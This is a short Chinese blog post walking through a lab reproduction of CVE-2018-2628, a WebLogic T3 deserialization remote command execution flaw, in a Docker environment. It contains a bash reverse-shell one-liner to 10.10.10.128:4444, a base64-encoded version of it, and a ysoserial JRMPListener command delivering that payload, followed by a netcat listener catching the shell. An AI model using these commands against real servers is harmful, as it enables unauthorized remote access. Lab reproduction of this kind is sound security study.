CVE-2018-2628

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

漏洞环境

cd weblogic/CVE-2018-2628
docker-compose up -d
docker-compose config

等待环境启动,访问http://10.10.10.8:7001/console

漏洞复现

下载ysoserial

weblogictool工具

bash -i >& /dev/tcp/10.10.10.128/4444 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}
  • 本地使用yso启动jrmp,工具中填入本地的jrmp地址
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"

img

img

  • nc监听反弹的shell
    img
    连接成功!!!
posted @ 2024-05-17 11:21  kalixcn  阅读(16)  评论(0编辑  收藏  举报